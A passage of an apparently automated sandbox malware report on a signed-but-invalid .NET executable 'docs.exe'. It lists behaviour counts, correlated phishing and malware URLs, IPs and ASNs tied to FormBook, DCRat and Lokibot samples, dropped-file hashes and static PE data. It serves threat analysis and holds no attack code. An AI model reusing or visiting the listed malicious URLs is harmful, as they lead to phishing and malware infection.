                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                    • VT rate limit hit for: docs.exe

                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                    12:16:00API Interceptor1x Sleep call for process: docs.exe modified
                                                                                                                                                                                                                    12:16:03API Interceptor12x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                    12:16:10API Interceptor8586818x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                    12:16:45API Interceptor7555907x Sleep call for process: wscript.exe modified

                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    188.114.96.3https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • wwvmicrosx.live/office365/office_cookies/main/
                                                                                                                                                                                                                    http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                                                                                                                                                                                    http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • mobilelegendsmycode.com/favicon.ico
                                                                                                                                                                                                                    http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                    • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                                                                                                                                                                                    ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.chinaen.org/zi4g/
                                                                                                                                                                                                                    http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                                                                                                                                                                                                                    Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • www.444317.com/
                                                                                                                                                                                                                    Sept order.docGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                                                                                                                                                                                                                    1e#U0414.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                                    • dddotx.shop/Mine/PWS/fre.php
                                                                                                                                                                                                                    https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • hdcy.emcl00.com/qRCfs/
                                                                                                                                                                                                                    185.26.122.70Dekont.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.oko.events/bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0

                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    www.oko.eventsDekont.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 185.26.122.70
                                                                                                                                                                                                                    Quotation #10091.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 185.26.122.70
                                                                                                                                                                                                                    PAGO_200924.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 185.26.122.70
                                                                                                                                                                                                                    www.j88.travelSOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 188.114.96.3

                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    HOSTLANDRUDekont.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 185.26.122.70
                                                                                                                                                                                                                    Wave.exeGet hashmaliciousDiscord Token Stealer, Orcus, SugarDumpBrowse
                                                                                                                                                                                                                    • 185.37.62.158
                                                                                                                                                                                                                    DFpUKTL6kg.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                    • 185.26.122.81
                                                                                                                                                                                                                    http://mydpd.space/Get hashmaliciousDCRat, PureLog StealerBrowse
                                                                                                                                                                                                                    • 185.26.122.30
                                                                                                                                                                                                                    HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                    • 185.26.122.79
                                                                                                                                                                                                                    yk2Eh24FDd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 185.26.122.81
                                                                                                                                                                                                                    hT0xyYJthf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 185.26.122.81
                                                                                                                                                                                                                    https://hideuri.com/EXWJgmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 185.26.122.79
                                                                                                                                                                                                                    rwDENO48jg.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                    • 185.221.215.184
                                                                                                                                                                                                                    i21878JK11.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                    • 185.26.122.80
                                                                                                                                                                                                                    CLOUDFLARENETUShttps://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.18.35.212
                                                                                                                                                                                                                    https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                    https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.22.52.71
                                                                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                    https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 172.67.148.87
                                                                                                                                                                                                                    http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.18.86.42
                                                                                                                                                                                                                    AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 172.67.216.244

                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\docs.exe.log

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\docs.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2232
                                                                                                                                                                                                                    Entropy (8bit):5.380747059108785
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//YPUyus:lGLHxvIIwLgZ2KRHWLOugQs
                                                                                                                                                                                                                    MD5:FE04A26B951232A817435FE243AF4AF7
                                                                                                                                                                                                                    SHA1:86834917D158EEF6387E90C3E81A535885E97EB4
                                                                                                                                                                                                                    SHA-256:30B53DB6EE84E8F39DB17AC3D9033EFDD467EE5CF48A30E2841CDDEB2B47D4E7
                                                                                                                                                                                                                    SHA-512:D4F431E48FE43095E8C893AA56CA2EC171043DF40E696AD698938B0D39D5CC1DE4CFBF2B88EC7B02F086DED236873F1B9A297F7B16C12933A44B55875EE5FF40
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xjde1xb.wjt.psm1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixin1ap4.ubn.ps1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrzyb2gx.gyv.ps1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yw10ynmk.ytu.psm1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Entropy (8bit):7.646580632187834
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                    File name:docs.exe
                                                                                                                                                                                                                    File size:740'872 bytes
                                                                                                                                                                                                                    MD5:136dcc6497b13fe87bbad4aa5f859593
                                                                                                                                                                                                                    SHA1:9da85420d2681d65df6757f44a0c8055ce6c1fba
                                                                                                                                                                                                                    SHA256:c89c37f0b5dc89251da6c37aa8e1071c43d52c80fd2326f1e6de8dcd5eaf0dfc
                                                                                                                                                                                                                    SHA512:5e842aa0858845c4322c847fd2497cfe515a2ed62e36337978a020c061d6555cb19dbac58c6c988a97d3bfd88de66bfc4a4e96bf1c46e78d94c2435051cd1c91
                                                                                                                                                                                                                    SSDEEP:12288:21ZF8Kz3TPb4DryC6L1+0rs/yo05u30HzdHpGo1UV60QFLZSkR:2yeyrUp1o/4HiV60sZh
                                                                                                                                                                                                                    TLSH:92F4CFC03B68B719DE784A74857ADDB492B52D587010FAE62EDD3B9739AC3109E0CF42
                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............n,... ...@....@.. ....................................@................................

                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                    Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Entrypoint:0x4b2c6e
                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                    Time Stamp:0xDE85E6B9 [Tue Apr 20 16:35:05 2088 UTC]
                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                    • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al

                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb2c1a0x4f.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x5dc.rsrc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xb18000x3608
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xaed2c0x70.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
